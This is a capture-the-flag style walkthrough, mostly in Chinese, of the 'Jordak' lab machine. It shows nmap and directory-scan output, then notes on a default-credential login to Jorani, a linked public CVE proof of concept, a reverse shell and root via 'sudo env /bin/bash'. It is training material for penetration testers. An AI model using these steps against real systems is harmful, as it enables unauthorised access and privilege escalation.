Jordak pg walkthrough Intermediate
NMAP
┌──(root㉿kali)-[/home/ftpuserr]
└─# nmap -p- -A 192.168.226.109
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-21 05:44 UTC
Nmap scan report for 192.168.226.109
Host is up (0.071s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 76:18:f1:19:6b:29:db:da:3d:f6:7b:ab:f4:b5:63:e0 (ECDSA)
|_ 256 cb:d8:d6:ef:82:77:8a:25:32:08:dd:91:96:8d:ab:7d (ED25519)
80/tcp open http Apache httpd 2.4.58 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-server-header: Apache/2.4.58 (Ubuntu)
| http-robots.txt: 1 disallowed entry
|_/
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=11/21%OT=22%CT=1%CU=36412%PV=Y%DS=4%DC=T%G=Y%TM=673
OS:EC903%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=104%TI=Z%CI=Z%TS=A)SEQ(
OS:SP=104%GCD=1%ISR=104%TI=Z%CI=Z%II=I%TS=A)SEQ(SP=104%GCD=2%ISR=104%TI=Z%C
OS:I=Z%II=I%TS=A)OPS(O1=M578ST11NW7%O2=M578ST11NW7%O3=M578NNT11NW7%O4=M578S
OS:T11NW7%O5=M578ST11NW7%O6=M578ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5
OS:=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M578NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%
OS:T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T
OS:=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL
OS:=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 73.12 ms 192.168.45.1
2 73.10 ms 192.168.45.254
3 73.73 ms 192.168.251.1
4 73.88 ms 192.168.226.109
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.83 seconds
dirsearch
┌──(root?kali)-[/home/ftpuserr]
└─# dirsearch -u 192.168.226.109
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/ftpuserr/reports/_192.168.226.109/_24-11-21_05-50-26.txt
Target: http://192.168.226.109/
[05:50:26] Starting:
[05:50:27] 400 - 1KB - /!.htaccess
[05:50:27] 400 - 1KB - /!.htpasswd
[05:50:27] 404 - 277B - /jsp
[05:50:27] 404 - 277B - /jsp.old
[05:50:27] 403 - 280B - /%3f/
[05:50:27] 400 - 1KB - /!.gitignore
[05:50:27] 404 - 277B - /js
[05:50:27] 404 - 277B - /js.old
[05:50:27] 404 - 277B - /js.php
[05:50:27] 404 - 277B - /jsp.tar
[05:50:27] 404 - 277B - /js.tar
[05:50:27] 404 - 277B - /jsp.tgz
[05:50:27] 404 - 277B - /js.tgz
[05:50:27] 404 - 277B - /jsp.txt
[05:50:27] 404 - 277B - /js.txt
[05:50:27] 404 - 277B - /jsp.zip
[05:50:27] 404 - 277B - /js.zip
[05:50:27] 400 - 1KB - /+CSCOE+/logon.html
[05:50:27] 400 - 1KB - /+CSCOE+/session_password.html
[05:50:27] 400 - 1KB - /+CSCOT+/oem
[05:50:27] 400 - 1KB - /+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua
[05:50:27] 400 - 1KB - /+CSCOT+/translation
[05:50:28] 400 - 1KB - /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
[05:50:28] 404 - 277B - /js.bak
[05:50:28] 404 - 277B - /jsp.bak
[05:50:28] 404 - 277B - /jsp.php
[05:50:29] 400 - 1KB - /.config/psi+/profiles/default/accounts.xml
[05:50:32] 200 - 505B - /.gitattributes
[05:50:32] 200 - 477B - /.gitignore
[05:50:32] 404 - 277B - /.gitignore/
[05:50:33] 403 - 280B - /.ht_wsr.txt
[05:50:33] 403 - 280B - /.htaccess.bak1
[05:50:33] 403 - 280B - /.htaccess.orig
[05:50:33] 403 - 280B - /.htaccess.sample
[05:50:33] 403 - 280B - /.htaccess.save
[05:50:33] 403 - 280B - /.htaccess_extra
[05:50:33] 403 - 280B - /.htaccess_orig
[05:50:33] 403 - 280B - /.htaccess_sc
[05:50:33] 403 - 280B - /.htaccessBAK
[05:50:33] 403 - 280B - /.htaccessOLD
[05:50:33] 403 - 280B - /.htaccessOLD2
[05:50:33] 403 - 280B - /.htm
[05:50:33] 403 - 280B - /.html
[05:50:33] 403 - 280B - /.htpasswd_test
[05:50:33] 403 - 280B - /.htpasswds
[05:50:33] 403 - 280B - /.httr-oauth
[05:50:33] 400 - 1KB - /.idea/workspace(2).xml
[05:50:33] 400 - 1KB - /.idea/workspace(3).xml
[05:50:33] 400 - 1KB - /.idea/workspace(4).xml
[05:50:33] 400 - 1KB - /.idea/workspace(5).xml
[05:50:34] 400 - 1KB - /.idea/workspace(6).xml
[05:50:34] 400 - 1KB - /.idea/workspace(7).xml
[05:50:36] 403 - 280B - /.php
[05:50:43] 400 - 1KB - /;/admin
[05:50:43] 400 - 1KB - /;/json
[05:50:43] 400 - 1KB - /;/login
[05:50:43] 400 - 1KB - /;admin/
[05:50:43] 400 - 1KB - /;json/
[05:50:43] 400 - 1KB - /;login/
[05:50:43] 400 - 1KB - /@
[05:50:47] 400 - 1KB - /actuator/;/auditevents
[05:50:47] 400 - 1KB - /actuator/;/auditLog
[05:50:47] 400 - 1KB - /actuator/;/beans
[05:50:47] 400 - 1KB - /actuator/;/caches
[05:50:47] 400 - 1KB - /actuator/;/conditions
[05:50:47] 400 - 1KB - /actuator/;/configprops
[05:50:47] 400 - 1KB - /actuator/;/configurationMetadata
[05:50:47] 400 - 1KB - /actuator/;/dump
[05:50:47] 400 - 1KB - /actuator/;/env
[05:50:47] 400 - 1KB - /actuator/;/exportRegisteredServices
[05:50:47] 400 - 1KB - /actuator/;/flyway
[05:50:47] 400 - 1KB - /actuator/;/heapdump
[05:50:47] 400 - 1KB - /actuator/;/info
[05:50:47] 400 - 1KB - /actuator/;/liquibase
[05:50:47] 400 - 1KB - /actuator/;/logfile
[05:50:47] 400 - 1KB - /actuator/;/loggingConfig
[05:50:47] 400 - 1KB - /actuator/;/mappings
[05:50:47] 400 - 1KB - /actuator/;/events
[05:50:47] 400 - 1KB - /actuator/;/refresh
[05:50:47] 400 - 1KB - /actuator/;/registeredServices
[05:50:47] 400 - 1KB - /actuator/;/features
[05:50:47] 400 - 1KB - /actuator/;/health
[05:50:47] 400 - 1KB - /actuator/;/healthcheck
[05:50:47] 400 - 1KB - /actuator/;/resolveAttributes
[05:50:47] 400 - 1KB - /actuator/;/httptrace
[05:50:47] 400 - 1KB - /actuator/;/sessions
[05:50:47] 400 - 1KB - /actuator/;/integrationgraph
[05:50:47] 400 - 1KB - /actuator/;/springWebflow
[05:50:47] 400 - 1KB - /actuator/;/jolokia
[05:50:47] 400 - 1KB - /actuator/;/statistics
[05:50:47] 400 - 1KB - /actuator/;/loggers
[05:50:47] 400 - 1KB - /actuator/;/status
[05:50:47] 400 - 1KB - /actuator/;/metrics
[05:50:47] 400 - 1KB - /actuator/;/trace
[05:50:47] 400 - 1KB - /actuator/;/prometheus
[05:50:47] 400 - 1KB - /actuator/;/releaseAttributes
[05:50:47] 400 - 1KB - /actuator/;/scheduledtasks
[05:50:47] 400 - 1KB - /actuator/;/shutdown
[05:50:47] 400 - 1KB - /actuator/;/sso
[05:50:47] 400 - 1KB - /actuator/;/ssoSessions
[05:50:47] 400 - 1KB - /actuator/;/threaddump
[05:50:49] 403 - 280B - /admin%20/
[05:50:52] 400 - 1KB - /Admin;/
[05:50:52] 400 - 1KB - /admin;/
[05:51:06] 403 - 280B - /application
[05:51:07] 403 - 280B - /application/
[05:51:07] 403 - 280B - /application/cache/
[05:51:07] 403 - 280B - /application/configs/application.ini
[05:51:07] 403 - 280B - /application/logs/
[05:51:07] 301 - 319B - /assets -> http://192.168.226.109/assets/
[05:51:07] 200 - 644B - /assets/
[05:51:16] 200 - 973B - /composer.json
[05:51:16] 200 - 89KB - /composer.lock
[05:51:20] 404 - 277B - /css
[05:51:20] 404 - 277B - /css.php
[05:51:23] 200 - 499B - /docker-compose.yml
[05:51:23] 200 - 495B - /docker/
[05:51:23] 200 - 879B - /Dockerfile
[05:51:24] 301 - 317B - /docs -> http://192.168.226.109/docs/
[05:51:24] 200 - 557B - /docs/
[05:51:28] 200 - 111KB - /favicon.ico
[05:51:36] 404 - 277B - /index.php-bak
[05:51:36] 404 - 277B - /index.php.
[05:51:36] 404 - 277B - /index.php.bak
[05:51:36] 404 - 277B - /index.php3
[05:51:36] 404 - 277B - /index.php4
[05:51:36] 404 - 277B - /index.php5
[05:51:36] 404 - 277B - /index.php::$DATA
[05:51:36] 404 - 277B - /index.php~
[05:51:38] 400 - 1KB - /jkstatus;
[05:51:38] 400 - 1KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd
[05:51:38] 400 - 1KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/help/*
[05:51:38] 400 - 1KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/jfrStart/filename=!/tmp!/foo
[05:51:38] 400 - 1KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/jvmtiAgentLoad/!/etc!/passwd
[05:51:38] 400 - 1KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/disable
[05:51:38] 400 - 1KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/output=!/tmp!/pwned
[05:51:38] 400 - 1KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmSystemProperties
[05:51:38] 400 - 1KB - /jolokia/exec/java.lang:type=Memory/gc
[05:51:38] 400 - 1KB - /jolokia/write/java.lang:type=Memory/Verbose/true
[05:51:38] 404 - 277B - /js/
[05:51:38] 404 - 277B - /js/elfinder/elfinder.php
[05:51:38] 400 - 1KB - /jolokia/read/java.lang:type=*/HeapMemoryUsage
[05:51:38] 404 - 277B - /js/envConfig.js
[05:51:38] 400 - 1KB - /jolokia/search/*:j2eeType=J2EEServer,*
[05:51:38] 400 - 1KB - /jolokia/read/java.lang:type=Memory/HeapMemoryUsage/used
[05:51:38] 404 - 277B - /js/FCKeditor
[05:51:38] 404 - 277B - /js/prepod.js
[05:51:38] 404 - 277B - /js/qa.js
[05:51:38] 404 - 277B - /js/routing
[05:51:38] 404 - 277B - /js/swfupload/swfupload.swf
[05:51:38] 404 - 277B - /js/swfupload/swfupload_f9.swf
[05:51:38] 404 - 277B - /js/config.js
[05:51:38] 404 - 277B - /js/tiny_mce
[05:51:38] 404 - 277B - /js/tinymce
[05:51:38] 404 - 277B - /js/tiny_mce/
[05:51:38] 404 - 277B - /js/yui/uploader/assets/uploader.swf
[05:51:38] 404 - 277B - /js/ZeroClipboard.swf
[05:51:38] 404 - 277B - /jscripts
[05:51:38] 404 - 277B - /jscripts/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php
[05:51:38] 404 - 277B - /js/prod.js
[05:51:38] 404 - 277B - /jscripts/tinymce
[05:51:38] 404 - 277B - /jscripts/tiny_mce/
[05:51:38] 404 - 277B - /jscripts/tiny_mce
[05:51:38] 404 - 277B - /jscripts/tinymce/
[05:51:38] 404 - 277B - /json
[05:51:38] 404 - 277B - /jsp-examples/
[05:51:38] 404 - 277B - /jsp-reverse.jsp
[05:51:38] 404 - 277B - /jsp/extension/login.jsp
[05:51:38] 404 - 277B - /jsp/help
[05:51:38] 404 - 277B - /jsp/viewer/snoop.jsp
[05:51:38] 404 - 277B - /jspbuild
[05:51:38] 404 - 277B - /js/tinymce/
[05:51:38] 404 - 277B - /jspm_packages/
[05:51:38] 404 - 277B - /jsps
[05:51:38] 404 - 277B - /js/ZeroClipboard10.swf
[05:51:38] 404 - 277B - /jssresource/
[05:51:38] 404 - 277B - /jscripts/
[05:51:40] 200 - 34KB - /LICENSE
[05:51:40] 403 - 280B - /local
[05:51:40] 403 - 280B - /local/
[05:51:40] 403 - 280B - /local/composer.lock
[05:51:40] 403 - 280B - /local/composer.phar
[05:51:41] 403 - 280B - /login.wdm%20
[05:51:47] 403 - 280B - /New%20Folder
[05:51:47] 403 - 280B - /New%20folder%20(2)
[05:51:52] 403 - 280B - /phpliteadmin%202.php
[05:51:52] 400 - 1KB - /phpmyadmin!!
[05:51:54] 200 - 278B - /phpunit.xml
[05:51:58] 403 - 280B - /Read%20Me.txt
[05:51:58] 200 - 5KB - /README.md
[05:52:00] 200 - 28B - /robots.txt
[05:52:00] 404 - 277B - /robots.txt.dist
[05:52:02] 400 - 1KB - /secure/ConfigurePortalPages!default.jspa?view=popular
[05:52:02] 400 - 1KB - /secure/ContactAdministrators!default.jspa
[05:52:02] 400 - 1KB - /secure/QueryComponent!Default.jspa
[05:52:02] 403 - 280B - /server-status
[05:52:02] 403 - 280B - /server-status/
[05:52:06] 301 - 316B - /sql -> http://192.168.226.109/sql/
[05:52:06] 200 - 629B - /sql/
[05:52:09] 403 - 280B - /system
[05:52:09] 403 - 280B - /system/
[05:52:09] 403 - 280B - /system/cache/
[05:52:09] 403 - 280B - /system/cron/cron.txt
[05:52:09] 403 - 280B - /system/error.txt
[05:52:09] 403 - 280B - /system/expressionengine/config/config.php
[05:52:09] 403 - 280B - /system/expressionengine/config/database.php
[05:52:09] 403 - 280B - /system/log/
[05:52:09] 403 - 280B - /system/logs/
[05:52:09] 403 - 280B - /system/storage/
[05:52:11] 301 - 318B - /tests -> http://192.168.226.109/tests/
[05:52:11] 200 - 531B - /tests/
[05:52:12] 400 - 1KB - /Trace.axd::$DATA
[05:52:12] 400 - 1KB - /typo3conf/ext/static_info_tables/ext_tables_static+adt-orig.sql
[05:52:12] 400 - 1KB - /typo3conf/ext/static_info_tables/ext_tables_static+adt.sql
[05:52:15] 200 - 0B - /vendor/autoload.php
[05:52:15] 200 - 729B - /vendor/
[05:52:15] 200 - 0B - /vendor/composer/autoload_classmap.php
[05:52:15] 200 - 0B - /vendor/composer/autoload_files.php
[05:52:15] 200 - 0B - /vendor/composer/autoload_namespaces.php
[05:52:15] 200 - 0B - /vendor/composer/autoload_psr4.php
[05:52:15] 200 - 0B - /vendor/composer/autoload_real.php
[05:52:15] 200 - 0B - /vendor/composer/autoload_static.php
[05:52:15] 200 - 0B - /vendor/composer/ClassLoader.php
[05:52:15] 200 - 1KB - /vendor/composer/LICENSE
[05:52:15] 200 - 80KB - /vendor/composer/installed.json
[05:52:18] 400 - 1KB - /web.config::$DATA
[05:52:20] 400 - 1KB - /wp-content/plugins/boldgrid-backup/=
[05:52:21] 400 - 1KB - /wps/contenthandler/!ut/p/digest!8skKFbWr_TwcZcvoc9Dn3g/?uri=http://www.redbooks.ibm.com/Redbooks.nsf/RedbookAbstracts/sg247798.html?Logout&RedirectTo=http://example.com
信息比较繁杂翻找页面半天找到了一个配置文件
访问该目录发现了登录页面
上网找默认密码
https://github.com/bbalet/jorani/blob/master/docs/install/README.md
登录成功
看看怎么样才能拿到shell了
然后就麻了 啥也找不到 一点利用点也没有
搜遍了exp 都没有用
直接看wp
答案也是搜exp 搜出来的 只能说信息收集能力还是太弱了
https://github.com/Orange-Cyberdefense/CVE-repository/blob/master/PoCs/CVE_Jorani.py
得详细学学谷歌搜索语法了
exp弹回来的shell不稳定 我们自己在弹一次
提权非常简单
sudo env /bin/bash 就完了
最难的还是信息收集 根本找不到exp
之后我总结了一下
可以直接这样搜索
jorani cve site:github.com
intext:jorani cve site:github.com
